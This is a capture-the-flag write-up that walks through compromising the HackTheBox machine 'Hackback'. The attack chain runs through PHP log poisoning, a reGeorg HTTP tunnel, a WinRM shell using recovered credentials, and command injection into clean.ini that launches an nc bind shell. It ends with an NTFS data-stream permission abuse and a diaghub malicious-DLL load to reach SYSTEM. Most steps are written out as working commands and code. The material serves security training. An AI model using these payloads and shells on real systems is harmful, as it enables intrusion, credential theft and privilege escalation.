Hackback is a very hard box. It involves phishing sites, parameter fuzzing, log poisoning, HTTP tunnelling, the WinRM service, the UserLogger service, NTFS data streams, malicious DLLs and more. It took me five days in total to work through and research; if you are interested you can try it on HackTheBox. In my view the two log-related steps are the really hard part. Don't they have something in common with the recent log4j2 remote code execution? Let's take a look.
0x01 Reconnaissance
Port scan
First, scan the target's ports with nmap:

```shell
nmap -Pn -p- -sV -sC -A 10.10.10.128 -oA nmap_Hackback
```

The target has ports 80, 6666 and 64831 open.
Port 80

Inspecting the page elements shows the site is built on ASP.NET.
Port 6666

```shell
curl http://10.10.10.128:6666
```

It replies that a command is missing, so I fuzz for valid paths with wfuzz:

```shell
wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt --hc 404 http://10.10.10.128:6666/FUZZ
```
That turns up several paths. Start with help:

```shell
curl http://10.10.10.128:6666/help
```

help lists every command, so next try each of the paths:

```shell
curl http://10.10.10.128:6666/hello
curl http://10.10.10.128:6666/proc | jq -c .[]
curl http://10.10.10.128:6666/whoami
curl http://10.10.10.128:6666/list | jq -c .[]
curl http://10.10.10.128:6666/services | jq -c .[]
curl -s http://10.10.10.128:6666/netstat | jq -r '.[] | select(.State==2) | "\(.LocalAddress):\(.LocalPort) [\(.OwningProcess)]"' | sed 's/::/0.0.0.0/g' | sort -n -t':' -k2
```

Summing up: hello returns a greeting; proc returns the process list; whoami returns details of the current user; list returns the contents of the web root; services returns the service list; netstat returns the socket table (the jq filter keeps only state 2, LISTEN). The netstat output shows more listening ports than nmap could see from outside, that is, ports bound only locally or blocked by the host firewall, such as WinRM on 5985, which we reach later through a tunnel.
Port 64831

This is a GoPhish login page.

The default credentials admin/gophish get us in.

Under Email Templates there are five templates: Admin, Facebook, HackTheBox, Paypal and Twitter.

Opening the Admin template and switching to the HTML view reveals a domain name.

Opening the other templates reveals further domains; collected together they are:
```
admin.hackback.htb
www.facebook.htb
www.hackthebox.htb
www.paypal.htb
www.twitter.htb
```
Add them to the hosts file so they resolve:

```shell
vim /etc/hosts
## configuration
10.10.10.128 admin.hackback.htb www.hackthebox.htb www.twitter.htb www.paypal.htb www.facebook.htb
```
Phishing sites

With that in place, visit the four domains in turn.

They are all clones of well-known sites' login pages, built to harvest victims' credentials: the attacker sends an email linking to the phishing site, and once the victim opens it and enters an account and password, the attacker captures them. The responses show these sites run on PHP and ASP.NET.
Admin login page

admin.hackback.htb is a login page unlike the phishing sites. In the page source

there is a hint: <script src="js/.js"></script>

but requesting the js directory gives a 403, so scan it with gobuster:

```shell
gobuster dir -u http://admin.hackback.htb/js/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x js -t 50
```

Look at private.js.

It contains the following.

JavaScript normally declares variables with var, but this file uses ine, which is var shifted by 13 letters, so the JavaScript is presumably ROT13-encoded. Undo it with tr:
```shell
curl http://admin.hackback.htb/js/private.js | tr 'a-zA-Z' 'n-za-mN-ZA-M'
```

Paste the result into beautifier.io to pretty-print it, which yields the JavaScript below:
```javascript
// String array: three base64 blobs, each RC4-encrypted with its own key
var a = ['\x57\x78\x49\x6a\x77\x72\x37\x44\x75\x73\x4f\x38\x47\x73\x4b\x76\x52\x77\x42\x2b\x77\x71\x33\x44\x75\x4d\x4b\x72\x77\x72\x4c\x44\x67\x63\x4f\x69\x77\x72\x59\x31\x4b\x45\x45\x67\x47\x38\x4b\x43\x77\x71\x37\x44\x6c\x38\x4b\x37', '\x41\x63\x4f\x4d\x77\x71\x76\x44\x71\x51\x67\x43\x77\x34\x2f\x43\x74\x32\x6e\x44\x74\x4d\x4b\x68\x5a\x63\x4b\x44\x77\x71\x54\x43\x70\x54\x73\x79\x77\x37\x6e\x43\x68\x73\x4f\x51\x58\x4d\x4f\x35\x57\x38\x4b\x70\x44\x73\x4f\x74\x4e\x43\x44\x44\x76\x41\x6a\x43\x67\x79\x6b\x3d', '\x77\x35\x48\x44\x72\x38\x4f\x37\x64\x44\x52\x6d\x4d\x4d\x4b\x4a\x77\x34\x6a\x44\x6c\x56\x52\x6e\x77\x72\x74\x37\x77\x37\x73\x30\x77\x6f\x31\x61\x77\x37\x73\x41\x51\x73\x4b\x73\x66\x73\x4f\x45\x77\x34\x58\x44\x73\x52\x6a\x43\x6c\x4d\x4f\x77\x46\x7a\x72\x43\x6d\x7a\x70\x76\x43\x41\x6a\x43\x75\x42\x7a\x44\x73\x73\x4b\x39\x46\x38\x4f\x34\x77\x71\x5a\x6e\x57\x73\x4b\x68'];
// Rotate the array: push(shift()) runs 0x66 times because e is called with ++d
(function(c, d) {
    var e = function(f) {
        while (--f) {
            c['push'](c['shift']());
        }
    };
    e(++d);
}(a, 0x66));
// b(index, key): decrypt a[index] with key, caching the result
var b = function(c, d) {
    c = c - 0x0;
    var e = a[c];
    if (b['MsULmv'] === undefined) {
        (function() {
            var f;
            try {
                // obtain the global object without naming it
                var g = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');');
                f = g();
            } catch (h) {
                f = window;
            }
            var i = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
            // atob polyfill for environments without one
            f['atob'] || (f['atob'] = function(j) {
                var k = String(j)['replace'](/=+$/, '');
                for (var l = 0x0, m, n, o = 0x0, p = ''; n = k['charAt'](o++); ~n && (m = l % 0x4 ? m * 0x40 + n : n, l++ % 0x4) ? p += String['fromCharCode'](0xff & m >> (-0x2 * l & 0x6)) : 0x0) {
                    n = i['indexOf'](n);
                }
                return p;
            });
        }());
        // q(ciphertext, key): base64 decode -> UTF-8 decode -> RC4
        var q = function(r, d) {
            var t = [],
                u = 0x0,
                v, w = '',
                x = '';
            r = atob(r);
            for (var y = 0x0, z = r['length']; y < z; y++) {
                x += '%' + ('00' + r['charCodeAt'](y)['toString'](0x10))['slice'](-0x2);
            }
            r = decodeURIComponent(x);
            // RC4 key scheduling
            for (var A = 0x0; A < 0x100; A++) {
                t[A] = A;
            }
            for (A = 0x0; A < 0x100; A++) {
                u = (u + t[A] + d['charCodeAt'](A % d['length'])) % 0x100;
                v = t[A];
                t[A] = t[u];
                t[u] = v;
            }
            // RC4 keystream XOR
            A = 0x0;
            u = 0x0;
            for (var B = 0x0; B < r['length']; B++) {
                A = (A + 0x1) % 0x100;
                u = (u + t[A]) % 0x100;
                v = t[A];
                t[A] = t[u];
                t[u] = v;
                w += String['fromCharCode'](r['charCodeAt'](B) ^ t[(t[A] + t[u]) % 0x100]);
            }
            return w;
        };
        b['OoACcd'] = q;
        b['qSLwGk'] = {};
        b['MsULmv'] = !![];
    }
    var C = b['qSLwGk'][c];
    if (C === undefined) {
        if (b['pIjlQB'] === undefined) {
            b['pIjlQB'] = !![];
        }
        e = b['OoACcd'](e, d);
        b['qSLwGk'][c] = e;
    } else {
        e = C;
    }
    return e;
};
var x = '\x53\x65\x63\x75\x72\x65\x20\x4c\x6f\x67\x69\x6e\x20\x42\x79\x70\x61\x73\x73'; // "Secure Login Bypass"
var z = b('0x0', '\x50\x5d\x53\x36'); // key "P]S6"
var h = b('0x1', '\x72\x37\x54\x59'); // key "r7TY"
var y = b('0x2', '\x44\x41\x71\x67'); // key "DAqg"
var t = '\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x28\x73\x68\x6f\x77\x2c\x6c\x69\x73\x74\x2c\x65\x78\x65\x63\x2c\x69\x6e\x69\x74\x29'; // "?action=(show,list,exec,init)"
var s = '\x26\x73\x69\x74\x65\x3d\x28\x74\x77\x69\x74\x74\x65\x72\x2c\x70\x61\x79\x70\x61\x6c\x2c\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2c\x68\x61\x63\x6b\x74\x68\x65\x62\x6f\x78\x29'; // "&site=(twitter,paypal,facebook,hackthebox)"
var i = '\x26\x70\x61\x73\x73\x77\x6f\x72\x64\x3d\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a'; // "&password=********"
var k = '\x26\x73\x65\x73\x73\x69\x6f\x6e\x3d'; // "&session="
var w = '\x4e\x6f\x74\x68\x69\x6e\x67\x20\x6d\x6f\x72\x65\x20\x74\x6f\x20\x73\x61\x79'; // "Nothing more to say"
```
The code sets a to an array of three base64 blobs, runs a rotation function over it with 0x66, and defines b as the decoder (base64, then RC4 with the key passed as the second argument). Run it in a local JavaScript interpreter, or on tio.run, and print z, h and y to recover the hidden strings.
Following the hint, request the 2bb6916122f1da34dcd916421e531578 directory. Requesting it directly redirects back to the root, while other paths under it return 404, which suggests there are further files inside. Brute-force the directory:
```shell
gobuster dir -u http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/ -w /usr/share/wordlists/dirb/big.txt -x php -t 50
```
That finds webadmin.php. Constructing the parameters from the decoded strings, action=list echoes a wrong-password message:

```shell
curl 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=test&session='
```

Fuzz the password with wfuzz:

```shell
wfuzz -c -w /usr/share/wordlists/SecLists/Passwords/darkweb2017-top1000.txt --hw 0 --hh 17 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=FUZZ&session='
```

The password is 12345678. Query again with it:

```shell
curl 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=12345678&session='
```

It returns a list of logs, but logs of which site? Testing shows that logging in on the hackthebox phishing site creates a new log, and its session id is mine, recorded along with my internal address.

Setting session to that session id and changing action to show returns the log contents:

```shell
curl -b "PHPSESSIONID=3c4b5b07fe829951a788d023036262fb6f49340d22959897bd937d096bc8183d" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=3c4b5b07fe829951a788d023036262fb6f49340d22959897bd937d096bc8183d'
```
0x02 Foothold [simple]

PHP log poisoning

Although we cannot learn the real path of the log file, we can write PHP code into it and then view it through show. Capture the login request to www.hackthebox.htb with BurpSuite and replace the username with PHP code; that log entry becomes our execution point.

Then query the log:

```shell
curl -b "PHPSESSIONID=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7'
```

The PHP code executes, so next try whoami.

Only a comma comes back, so the whoami command did not run (the command-execution functions are evidently blocked).
The list and show actions themselves list and read files, and creating these logs writes files, so the file functions are clearly still allowed. Use scandir and print_r at the execution point to list a directory and print the result:

```php
<?php echo print_r(scandir($_GET['dir']));?>
```

Pass the directory to the execution point through a dir parameter on the show request:

```shell
curl -b "PHPSESSIONID=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7&dir=.'
```

It returns the file names in the current directory. Next write <?php include($_GET['file']);?> at the execution point

and try reading a file:

```shell
curl -b "PHPSESSIONID=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7&dir=.&file=index.html'
```

It returns the contents of index.html. To get PHP files back as source rather than executed or garbled, read them through the php://filter stream with base64 encoding:

```shell
curl -b "PHPSESSIONID=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7&dir=.&file=php://filter/convert.base64-encode/resource=webadmin.php'
```

That works; base64-decode the saved output:

```shell
cat webadmin.php.bs64 | base64 -d
```
Since we can read files, try writing one with file_put_contents. First base64-encode the content:

```shell
echo "mac is good" | base64 -w0
```

Then write this at the execution point so the log entry writes the file when it is executed:

```php
<?php $f="bWFjIGlzIGdvb2QK";file_put_contents("mac.txt",base64_decode($f));?>
```

Listing the current directory shows that mac.txt has been written. Note that the following request has to be run twice before the new file shows up:

```shell
curl -b "PHPSESSIONID=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7&dir=.'
```

Request the file's URL to view mac.txt:

```shell
curl http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/mac.txt
```
So far the execution point lets us list, read and write files. Next, write code at the execution point to list the parent directory:

```php
<?php print_r(scandir('..'));?>
```

View the parent directory:

```shell
curl -b "PHPSESSIONID=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7&dir=..'
```

That shows web.config and web.config.old, so write more PHP at the execution point to read them:

```php
<?php echo file_get_contents('../web.config');?>
<?php echo file_get_contents('../web.config.old');?>
```

web.config.old contains a Windows user account and password.
WinRM through a tunnel

From the netstat output gathered earlier we know WinRM is listening on 5985, but the firewall does not let us reach it from outside. The site runs both ASP.NET and PHP, and PHP has functions blocked, so we use an ASP.NET tunnel: upload the reGeorg tunnel script.

Tool: https://github.com/sensepost/reGeorg

First base64-encode tunnel.aspx:

```shell
cat tunnel.aspx | base64 -w0
```

Write that base64 blob at the execution point and decode it with base64_decode() (the blob, a very long base64 string, is omitted here):

```php
<?php $f="...";file_put_contents("tunnel.aspx",base64_decode($f));?>
```

After triggering it through the log, list the directory and request the file; the tunnel responds, so the proxy script is in place:

```shell
curl 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=12345678&session='
curl http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/tunnel.aspx
```

Next point proxychains at the local SOCKS port that reGeorg will open (reGeorg speaks SOCKS5):

```shell
vim /etc/proxychains4.conf
## configuration
socks5 127.0.0.1 8888
```

Start reGeorgSocksProxy to build the HTTP tunnel:

```shell
python reGeorgSocksProxy.py -p 8888 -u http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/tunnel.aspx
```
Connect with a WinRM script: Alamot's Ruby WinRM shell, extended with an UPLOAD command for pushing files. The code, with the credentials from web.config.old filled in, follows.

Original script: https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell.rb
```ruby
require 'winrm-fs'
# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt

# Endpoint is localhost:5985 because the connection is routed through the
# reGeorg SOCKS tunnel (proxychains) to the target's WinRM listener.
conn = WinRM::Connection.new(
  endpoint: 'http://127.0.0.1:5985/wsman',
  user: 'simple',
  password: 'ZonoProprioZomaro:-(',
  :no_ssl_peer_verification => true
)
file_manager = WinRM::FS::FileManager.new(conn)

class String
  # Split a command line on whitespace while keeping quoted arguments
  # together, then strip surrounding spaces and quotes from each token.
  def tokenize
    self.
      split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
      select {|s| not s.empty? }.
      map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
  end
end

command=""
conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    # Build a prompt of the form "PS user@host dir> "
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi -force $pwd).Name),'> ')")
    print(output.output.chomp)
    command = gets
    if command.start_with?('UPLOAD') then
      upload_command = command.tokenize
      print("Uploading " + upload_command[1] + " to " + upload_command[2])
      file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
        puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
      end
      command = "echo `nOK`n"
    end
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print(stdout)
      STDERR.print(stderr)
    end
  end
  puts("Exiting with code #{output.exitcode}")
end
```
Run winrm_shell.rb through the proxy:

```shell
proxychains ruby winrm_shell.rb
```

We get a shell as the simple user.
0x03 Privilege escalation [hacker]

Checking the local environment

Check the PowerShell language mode; it is FullLanguage:

```powershell
$executioncontext.sessionstate.languagemode
```

AppLocker bypass: upload nc.exe into C:\Windows\System32\spool\drivers\color, a directory that normal users can write to but that falls under the default AppLocker rule allowing executables from the Windows directory, so binaries dropped there are allowed to run:

```powershell
UPLOAD /root/hackthebox/Machines/Hackback/nc.exe C:\Windows\System32\spool\drivers\color\nc.exe
```
Start an nc listener locally on port 443 and try to call back; the connection never arrives:

```powershell
C:\Windows\System32\spool\drivers\color\nc.exe 10.10.14.14 443
```

Firewall restrictions: check whether the firewall limits outbound traffic:

```powershell
cmd /c "netsh advfirewall show currentprofile"
```

The default policy blocks both inbound and outbound, so look at the rules:

```powershell
cmd /c "netsh advfirewall firewall show rule name=all"
```

There are two rules, ping and web; the web rule covers ports 80, 6666 and 64831, so only those ports are allowed through.
Looking around the file system

List the root of C:, paying attention to the util directory:

```powershell
dir c:\
```

List everything in it, including hidden items:

```powershell
dir c:\util -force
```

The hidden scripts folder is the interesting one:

```powershell
dir c:\util\scripts
```

log.txt and batch.log were modified today, and dellog.ps1 is a script. We can only read log.txt; batch.log and dellog.ps1 are not readable for us.
Command injection to get an nc shell

Check clean.ini; it looks like the parameter file for dellog.ps1.

When dellog.ps1 runs it passes the values from clean.ini straight into a command, so there is a command injection here. Edit clean.ini and put a command in it:

```powershell
echo [Main] > C:\util\scripts\clean.ini
echo Lifetime=100 >> C:\util\scripts\clean.ini
echo "LogFile=c:\util\scripts\log.txt & cmd.exe /c c:\Windows\System32\spool\drivers\color\nc.exe -lvp 2222 -e cmd.exe" >> C:\util\scripts\clean.ini
echo "Directory=c:\inetpub\logs\logfiles" >> C:\util\scripts\clean.ini
```

The command is written. About five minutes later the scheduled run starts the listener, and nc can connect to the target through the proxy (the connection originates on the box itself, so the firewall rules do not block it):

```shell
proxychains nc 10.10.10.128 2222
```

We get a shell.
Reading user.txt

```bat
dir c:\Users\hacker\Desktop
type c:\Users\hacker\Desktop\user.txt
```

First flag obtained.
0x04 Privilege escalation [system]

Analysing the UserLogger service

Enumeration turns up an unfamiliar service, UserLogger. Look it up in the registry:

```bat
reg query HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\userlogger
```

Start UserLogger with c:\mac as its argument:

```bat
sc start userlogger c:\mac
```

mac.log now exists in the root of C:; view it, then check its permissions, which grant Everyone access:

```bat
cacls C:\mac.log
```

Analysis shows the service takes the path it is given, appends .log to the last name component, creates the file and rewrites its permissions. NTFS does not allow : inside a file name, but a trailing : turns the rest into a named alternate data stream: with an argument of c:\users\administrator: the service opens c:\users\administrator:.log, which is a stream called .log on the administrator directory itself. Streams share the security descriptor of the object they hang off, so the Everyone permission lands on the directory (or file) we name instead of on a new .log file.
Reading root.txt through NTFS data streams

Now try for root.txt. First get into the administrator directory:

```bat
sc start userlogger "c:\users\administrator:"
icacls c:\users\administrator
cd c:\users\administrator
```

That works; next target root.txt:

```bat
sc stop userlogger
sc start userlogger "c:\users\administrator\desktop\root.txt:"
```

Reading it directly from cmd does not work; switch to PowerShell:

```powershell
powershell
copy c:\users\administrator\desktop\root.txt .
cat root.txt
```

That is not the content we want; the flag must be sitting in an alternate data stream, which the copy preserved:

```powershell
Get-Item c:\users\administrator\root.txt -Force -Stream *
Get-Content c:\users\administrator\root.txt -Stream flag.txt
```

Second flag obtained.
Malicious DLL to get SYSTEM

In April 2018 Google's Project Zero published a post showing that the diaghub service can be told to load a DLL from System32 as SYSTEM, and that it does not check the file's extension: write a DLL into System32 under any name and ask diaghub to load it. So, with the same trick as above, I can have UserLogger create the "log" file in System32, put the malicious DLL into that log file, and call diaghub to load it.

Exploit source: https://github.com/decoder-it/diaghub_exploit

Build the malicious DLL in Visual Studio: open the project folder above and build it, selecting SDK 10.0.17736.0.

The project builds successfully.
In the shell, write the following into mac.bat:

```bat
C:\Windows\System32\spool\drivers\color\nc.exe -l -p 5555 -e cmd.exe
```

In FakeDLL.cpp change the command to the local path of that bat script, then rebuild.

Likewise, in diaghub_exploit.cpp change the directory the exploit executes from, to get around the AppLocker policy, rebuild, and collect diaghub_exploit.exe and FakeDll.dll from the output directory.

Upload both to C:\Windows\System32\spool\drivers\color:

```powershell
UPLOAD diaghub_exploit.exe C:\Windows\System32\spool\drivers\color\mac.exe
UPLOAD FakeDll.dll C:\Windows\System32\spool\drivers\color\FakeDll.dll
```

From a PowerShell prompt start UserLogger, then copy FakeDll.dll into C:\Windows\System32:

```powershell
cmd /c "sc.exe start userlogger C:\Windows\System32\mac"
copy C:\Windows\System32\spool\drivers\color\FakeDll.dll C:\Windows\System32\mac.log
```
But it fails, which means the malicious DLL has not landed in C:\Windows\System32. Check for mac.log:

```powershell
ls c:\windows\system32 | findstr mac
```

No log file was created there. The appsec video says Invoke-Expression is needed for the write:

```powershell
Invoke-Expression "sc.exe start UserLogger C:\Windows\System32\mac"
```

Still nothing in C:\Windows\System32. It turned out I had the wrong nc architecture: the 64-bit nc has to be uploaded:

```powershell
UPLOAD /root/hackthebox/Machines/Hackback/nc64.exe C:\Windows\System32\spool\drivers\color\nc.exe
```

Running it again, mac.log appears.

Now copy the malicious DLL into C:\Windows\System32 under the name mac.log and run the exploit:

```powershell
copy C:\Windows\System32\spool\drivers\color\FakeDll.dll C:\Windows\System32\mac.log
C:\Windows\System32\spool\drivers\color\mac.exe mac.log
```
Check the local listening ports; if 5555 is open the exploit worked.

Finally connect through the proxy and get SYSTEM:

```shell
proxychains nc 10.10.10.128 5555
```

Get the flag through the NTFS data stream:

```bat
dir c:\users\administrator\Desktop /a /r
cd c:\users\administrator\Desktop
powershell -c "Get-Content root.txt -Stream flag.txt"
```